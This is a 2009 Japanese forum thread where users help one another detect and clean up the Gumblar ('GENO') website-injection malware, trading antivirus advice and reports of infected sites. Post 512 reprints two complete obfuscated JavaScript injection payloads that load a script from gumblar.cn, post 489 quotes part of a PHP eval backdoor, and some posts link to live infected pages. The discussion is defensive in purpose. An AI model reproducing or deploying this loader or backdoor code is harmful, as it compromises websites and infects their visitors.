399 名前:前スレ77 mailto:sage [2009/05/16(土) 09:53:01 ]
>>388
でも、まだ増え続けてるよ

400 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:53:06 ]
いや>379も>386も自分です

PCだけウィルス感染してる場合はすぐクリーンインスコ&パス変更で、
PCもサイトも感染済みの場合は、もうパス抜かれてるんだから
感染拡大防止に鯖のファイルまず全部消した方がいいんじゃないのかと思ったのです



401 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:53:30 ]
>>394
前回のインストール用のkis8フォルダが残ってないかチェック

402 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:54:45 ]
>>391
Vista機の購入で解決。
間違っても、安易にXPからVistaにアップしないこと。

403 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:56:19 ]
Vistaでも感染してる人がいるらしいじゃない?

404 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 09:59:58 ]
hXXp://www.zengozen.co.jp/
も感染確認

405 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:00:03 ]
システムドライブ以外のドライブのデータファイルも改竄されたりするの?

406 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:01:53 ]
>>401
ありがとうございます、消せました。
あと最初にカスペのサイト開いた時はまとめwikiのリンクから行ったんですが
wikiおかしくなってるんですよね。
検索かけたいんですがカスペって何て正式名称何だったでしょうか。

407 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:04:23 ]
>>404
GJ 踏んできま〜す

408 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:04:39 ]
>>406
カスペでぐぐればカスペルスキーがでてくるだろ。
どこまで教えてちゃんなんだよ・・・

409 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:04:50 ]
vista感染した奴は挙手!
uac切ってた?

410 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:04:57 ]
カスペルスキー



411 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:06:45 ]
>>406
Kaspersky (カスペルスキー)

ジャストシステムのとこでいいのかな?
ttp://www.just-kaspersky.jp/

一応カスペWiki
ttp://kaspe.2chv.net/wiki/index.php?FrontPage

412 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:06:48 ]
>>404
ヤバッ!埋め込まれている!


413 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:08:35 ]
>>404
>>31
あほ?

414 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:09:15 ]
なんだいw載ってたやつかw

415 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:10:52 ]
放置されてるな

416 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:11:10 ]
4月くらいに再起動できなくなるとか言ってたけど今どうなの?
regeditなんてそうそう使わないから気付かなそう

417 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 10:11:11 ]


切ってないけどIeがアドビの更新頻繁に求めて来た

因みにアバストで検査したけど出てこなかった

バックアップした外付け感染してんのかな…


418 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:14:04 ]
>>408
すみません、先に調べるべきでした。

>>410>>411
ありがとうございます。

419 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:17:00 ]
avastに乗り換えてスキャンやってるんだが
かなり時間かかるのなこれ

420 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:19:17 ]
ここで出てくるavastってフリー版のやつだよね? 有料版あるのかは知らないけど
avastって他のウイルスに対してはどうなのかな?
avastって良いんだろか? avastたんがいいのは分かるんだけど



421 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:19:50 ]
avastかAVGで昔迷って
AVGだったけど今回からavastになった

422 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:19:51 ]
もうブラウザにpdfを表示しないみたいなオプション付けろよ

423 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:19:58 ]
>>400
PCだけの感染だけならば多分そう。
ただサイトのも変更されていた場合は、アクセスし削除する前に
自身のPCのhtmlを削除し無いと消している間等で、本人が消したつもりでも
再度なにかが転送される恐れがある。

424 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:22:49 ]
流れ早いお

425 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:22:53 ]
カスペってKaspersky Internet Security 2009とKaspersky Anti-Virus 2009、
Kaspersky Anti-Virus for Windows Server 6.0 Home Server Editionのどれがいいんですか?

426 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:23:29 ]
>>63でも出てるけど、うちもcmd.exeで実行して
「dir C:\WINDOWS\system32\sqlsodbc.chm」で
エンター押したら「ファイルが見つかりません」って出る。
XPなんだが、ファイル一体どこにいるんだ……。
それともアウアウってこと?

427 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:23:58 ]
>>421
ありがとう
ここ2年くらいカスペ試用版で特にまだ感染とか無いんだけど気になって聞いてみました

428 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:24:25 ]
>>426
なんで普通にエクスプローラで見ようと思わないんだよ

429 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:24:25 ]
>>422
Fxならプラグインから無効化出来なかったっけ
てかお前らそもそもPDFなんて読むよむのかよ
AReaderごとアンインストール→smartpdfで良くね

430 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:24:35 ]
>423
なるほど解りました
ありがとう



431 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:26:36 ]
そういうときは地道に辿っていくしかないべや
Cドライブ→WINDOWS→system32
で、自分の目でsqlsodbcってファイルを探す

432 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:27:16 ]
>>428
ああありがとう!それでも見られたね!
感染を自己申告したサイトを見ててすげえてんぱってた。
50KBだったのでようやく安心できたよ、有難う!

433 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:27:17 ]
>>431>>426へのレス

434 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 10:27:49 ]
このウイルスって万全な対策法がないんだよね。
それじゃクリーンインストールしたところで再感染しそう。。
しかも感染か未感染かを確実に判別する方法がないから、いつまでたっても疑心暗鬼。
めんどくさい。。

435 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:28:03 ]
>>431

436 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:28:15 ]
>>422
PDFをブラウザに表示ってAdobe Reader側にある

437 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:29:27 ]
>>426です

>>431さんもありがとう。
てんぱりの余韻で変に安価だけ投稿してしまった。
それでは七誌に戻ります。


438 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:29:36 ]
>>425
普通のPCならKaspersky Internet Security 2009

439 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:31:23 ]
>>426
同人版のまとめwikiは何かが全角だとかでそのままコピペはダメらしい
同人版のスレ内にコピペが貼ってあるからそれコピペすれば普通にでてきた

440 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:32:46 ]
今回ばかりは対策しないとだめだと思って
昨日の夜からはじめたらもう朝だぜ・・・



441 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:32:50 ]
今回のやつとは関係ないけど

うちのavastが反応するんですが、なにこれ
りぶメールってところのサイト
ttp://www.livmail.com/3others-page/janet/tokusen/index.htm

442 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:33:43 ]
>>438
ありがとうございます!

443 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:34:32 ]
ってかリブメールのトップで反応あり

444 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 10:34:54 ]
>>441
ばっちり関係あります

445 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:35:15 ]
h抜きでも飛べるから工夫して貼れっつーの

446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:35:20 ]
>>439
\ が全角だから

447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:36:28 ]
regeditはファイル名の先頭がregedの場合動作できないみたいだから
c:\windows\regedit.exeをデスクットップにでもコピーして名前変えて実行すると普通に起動できた

448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:36:53 ]
441はあぼーん依頼すべきだな

449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:37:09 ]
工夫して貼ってないとわざとやってると思われるよ
あちらこちらにわざとやってんのいるから

450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:37:40 ]
>>444
今回のウイルスですか?

>>445
すまそ



451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:37:48 ]
これってCドライブのファイルしか書き換えないんなら外付けHDD買ったときに付いてきたHD革命でCドライブのバックアップイメージ作っといて
もし感染したらイメージ復元で戻せばとりあえず感染前には戻せるんだよね?
フラッシュとアクロバットリーダーは最新にしたけどPCに最初から入ってたバスターではダメっぽいしもうマジで怖いよorz

452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:39:16 ]
ちなみに 441 は

ドリームメールの 【P貯め〜る】ってメールから
リンクされています。
アクセスすると2ポイント

なんです。

453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:39:25 ]
>>451
つシステムの復元

454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:39:35 ]
バスターでは他のウイルスでも駄目なの多いからな

455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:39:54 ]
相変わらずaguseは反応しない。

456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:39:59 ]
>>441
ソースに
(function(){var UkRR='%';var WdBp=('v&61r&20a以下略
と入って居ますね

457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:40:14 ]
>>441
責任もって削除以来してこい

458 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:40:28 ]
Adobe Reader→環境設定→インターネット→PDFをブラウザに表示

PDFをブラウザに表示のチェックも外したほうがいいんじゃない?

459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:40:57 ]
メールからは感染しないんだよな?

460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:41:44 ]
HTMLメールに仕込めばいくらでも逝けるんじゃね?



461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:42:00 ]
>>458
だいぶ前からはずすように言われてるよ

462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:46:45 ]
よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうpしようかな

463 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:47:10 ]
>>461
読み直したら・・・
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから( ̄▽ ̄;)

464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:49:56 ]
テンプレに反映出来てないんだろうな

465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:50:11 ]
>>463
もしかしたら前スレかもしれないけど両方はずとくといいって

466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:51:51 ]
>>462
ソースに情報が書き込まれてるって>>456でかいたんだが?

467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:52:24 ]
ほんとだこのスレには>>436しかないね

468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:53:24 ]
>>441
うぁぁぁぁぁぁ

469 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:53:43 ]
>>466
いや、ただ試しに踏んでみたいだけ。

470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:54:12 ]
>>441
踏んじまっただろ!!責任取れ!!



471 名前:463 mailto:sage [2009/05/16(土) 10:54:37 ]
一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います

472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:54:50 ]
>>462
やめておいた方がいい
www.virustotal.com/jp/analisis/2addc1c0a43118e4aca91e5c32a80b45

473 名前:94 101 154 mailto:sage [2009/05/16(土) 10:55:04 ]
>>422
Firefox側にもIE側にもついてるよ。

ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい(多分、あまり騒ぎ立てて欲しくないっぽい)
感染を全て確認したわけではないし、全ては自己責任の範囲で らしいが。
俺は今から登録する。


KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。

474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 10:55:35 ]
>>471
えらい!

475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:00:47 ]
ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。

476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:01:15 ]
最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな

477 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:02:35 ]
>>475
たぶん、日本語入ってないとこに移すの忘れずに

478 名前:463 471 mailto:sage [2009/05/16(土) 11:04:28 ]
あとは・・・sqlsodbc.chmの場所ですが

Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411

のどちらかにあると思います

479 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:04:29 ]
もうだめだ!!!!!!!!
インターネット閉鎖してください!!!!!!!!!!

480 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:04:31 ]
>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。



481 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:06:20 ]
まだやってんのかよ・・・。


482 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:06:41 ]
macを確認したいのですがどうやって調べればいいのでしょうか?

483 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:06:46 ]
>>470
www。livmail。com
(株) りぶメール
店舗連絡先: 0120-二五五-八八八

電凸よろ

484 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:06:58 ]
インターネット閉鎖できませーん

485 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:08:01 ]
>>479,484
笑わすなww

486 名前:94 101 154 mailto:sage [2009/05/16(土) 11:08:51 ]
>>473
の>デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。

>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの?

とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも(その分重いけど)。
avast と BitDefender のデュアルエンジンだったはず。
https://www.junglejapan.com/products/sec/gdata/trial/
メール登録あり。

>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。 

487 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:09:22 ]
sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば?
Everythingとかいろいろあるでしょ

488 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:10:14 ]
これってファイルにも感染しますか?
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染?

489 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:10:31 ]
うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない?php使ってjavascript書かれてるんだが。unescapeとかも見える

どこかに全文貼ったほうがいい?詳しい人いる?

490 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:12:54 ]
>>489
それアウトだな。



491 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:13:28 ]
書こうと思ったらもう載ってた
www3.atword.jp/gnome/
緊急のとこね
>>441はmartuzに飛ばされるから

492 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 11:15:20 ]
あの〜、皆様にお尋ねしたいのですが、先日から私のPCにインストールしてある
adobe acrobat9.0が勝手に閉じてしまうのですが、原因わかる方おられないでしょうか?
ネットでいろいろ検索してみたところ、ここで「勝手に起動する」とありましたので、
何らかの関連性があると思いカキコしました。詳しく言うと、acrobatを起動して、数秒後
に勝手に閉じてしまいます。もしかしてこのGENOウィルスが原因なんでしょうか?
そもそもGENOウィルスって何ですか?もしそれが原因なら、対処方法はあるのですか?
素人で大変申し訳ありませんが、宜しくお願いします。

493 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:15:23 ]
>>482
Vistaユーザーだからmacはわからないです><

494 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:17:06 ]
>>492
まずはこのスレを最初から読もうね

495 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:19:13 ]
>>489
それ・・・アウト。
どこかにgumblarとか書かれて無いかな?

496 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:20:09 ]
質問スレって無いんだっけ
混在しちゃうと読みづらい

497 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:22:53 ]
俺なんてTシャツ着て転げまわるから空拭きの雑巾要らない

498 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:24:45 ]
Adobe Reader をアンスコすれば解決すんの?
使わないしイラネーな

499 名前:489 mailto:sage [2009/05/16(土) 11:25:00 ]
>>490,495
今まで見たヤツはgumblarとか書いてあったがこれはない
base64でエンコードされてるからだけどね

500 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:25:50 ]
>>498
フラッシュプレイヤーも



501 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:26:00 ]
ちょ、なんだよ。前スレ落ちたな〜なんて思って寝たら、もうこんなにスレ進んでんのかよ。

502 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:26:25 ]
evalとunescapeの両方があったらほぼ確定じゃないかな

>>441
大当たり 比較的最近の型かな


503 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:27:53 ]
それカスペでも反応する?

504 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:29:17 ]
>>499
んじゃ>>491
martuzとかは?

505 名前:94 101 154 mailto:sage [2009/05/16(土) 11:29:56 ]
>>491
Nice!



506 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:30:22 ]
おもしれえなこのスレw

507 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:30:24 ]
ちょっと何この速さ
いつの間に5いってんの・・・
バグ?だれか説明してくれ

508 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:31:44 ]
PeerGurdianで、危険IP弾いてるんだけど
IP一覧みたいなまとめって、どこかあるんだっけ
94.247.2.195だけ?

509 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:31:50 ]
Avira AntiVirを導入してるから安心してみておける

510 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:32:20 ]
>>441
これ踏むとどうなるの?



511 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:32:38 ]
勿論感染

512 名前:改ざんされたソース mailto:sage [2009/05/16(土) 11:33:00 ]
814 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 03:13:30
>>732 なるほど

恐らくこれだな

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト


以上、前スレから転載
ドットがアンダーバーに変わっている亜種もあるっぽい

513 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:33:39 ]
>>508
>>380

514 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:34:01 ]
>>508
>>380

515 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:34:43 ]
>>513
サンキュ、助かった

516 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:34:56 ]
22秒撃ち負けたw

517 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:35:43 ]
改竄が読めません!

518 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:35:47 ]
Googleが実現させたシンプルで高機能なブラウザ
www.google.co.jp/intl/ja/landing/chrome/index.html

WindowsXPを利用の初心者はこのブラウザでOK!
感染したサイトや、危険なURLを開くとブラウザが危険を知らせてくれます。
Vistaでは埋め込まれたJSに反応しないため危険警告は出ずそのサイトが表示します。

上級者にはFirefoxの設定変更で回避する方法がおすすめです。

519 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:36:21 ]
>>509
擦り抜けるつってんだろ

520 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:37:04 ]
なんかもう順番に読んでくのメンドイ;;;
読むより早くスレが進んでいくよーT-T
こんなの実況スレ以来だよ―――――っ。



521 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:37:13 ]
avastが株上げたな
無料の分際でやるわねなんて思っていないんだからねっ

522 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:38:20 ]
何で勢いこんなにあがったのかと思ったら同人サイトも改変されちゃったのね


523 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:38:24 ]
同人スレのまとめの人も混乱してやがる\(^o^)/

524 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:38:41 ]
感染サイト
hxxp://expss.main.jp/expss2/2005/07/

525 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:38:58 ]
>>518
>上級者にはFirefoxの設定変更で回避する方法がおすすめです

詳しくお願い

526 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:40:53 ]
www31.atwiki.jp/doujin_vinfo/

同人板のまとめが分かり易いよ

527 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:41:39 ]
今更だけどProxomitronでフィルタ作れば良くね

528 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:42:45 ]
>>520
すげえきもい
才能あるなおまえ

529 名前:489 mailto:sage [2009/05/16(土) 11:42:59 ]
evalとunescape両方あるね
FFFTPからそのphpファイルをTeraPadで開こうとするとAVGが反応する
ローカルにダウンロードしてから開くと反応しない、設定の問題か。
「ウイルス JS/Downloader.Agentが特定されました」って出るね

530 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:43:18 ]
BSODってなに?



531 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:43:44 ]
>>521
対応早いのはユーザーの多さじゃないか?

532 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:44:03 ]
>このウィルスはKasperskyかニフティオンラインスキャン、avast!、ウイルスバスタ2009でしか今現在、検索できないウィルスです

バスター2007、2008はだめなのか?

533 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:45:00 ]
>>525
ttp://www31.atwiki.jp/doujin_vinfo/pages/19.html
とりあえずここを参照

534 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:45:25 ]
なんでGENOウイルスなの?GENOは被害者じゃないの?

535 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:45:50 ]
やられた。同人サイトなんて見てないしgumblarに飛ばされたこともない。
怪しいexe実行した覚えもないしどこから感染したのか…。


536 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:19 ]
>>534
もはや、加害者だろ

537 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:21 ]
>>524
うわ。徹底的にやられてるね。
(function(TitRT)
(function(j4A)
(function(x5E)

とか、計24個貼ってある。

538 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:25 ]
md5+それ以外のハッシュも求めるならAXHashTransおぬぬめ
ttp://www.vector.co.jp/soft/win95/util/se375205.html

539 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:27 ]
>>525
使用ブラウザをFirefoxに変更、アドオンにNoScriptを入れる

540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:37 ]
>>530
ブルースクリーンとは 【blue screen】 - 意味・解説 : IT用語辞典
e-words.jp/w/E38396E383ABE383BCE382B9E382AFE383AAE383BCE383B3.html



541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:41 ]
ウイルスバスター2009対応してないんじゃないの

542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:46 ]
>>507
同人関係で大量の個人サイト感染発覚→パニック&祭り

543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:54 ]
>>532
むしろウイルスバスタ2009平気ってほんとなのか

544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:56 ]
>>534
被害者っちゃあ被害者だけど
真っ先に発覚したにも関わらず放置した期間が長かったし

545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:46:57 ]
>>532
2009はついこの間更新されて検出出来るようになったみたいですね〜

2009に換えろということかも・・・?w

546 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:47:24 ]
>>518
Genoウイルスが変化したらChromeは直ぐに対応するのかな

547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:47:33 ]
>>534
爆発的に感染者を増やした上
対応がお粗末だったから皮肉を込めてそう呼ばれてる

548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:48:54 ]
バスターのGENOME.BK って
誤検出じゃないの?
それとは違うくて?

549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:48:58 ]
>>545
亜種まで検出してんの?

550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:49:08 ]
そして週末土日で対応遅れるだろうし
もうどこのサイトも信用できない((((;゚Д゚))))



551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 11:49:14 ]
>>533
>>539
ありがと

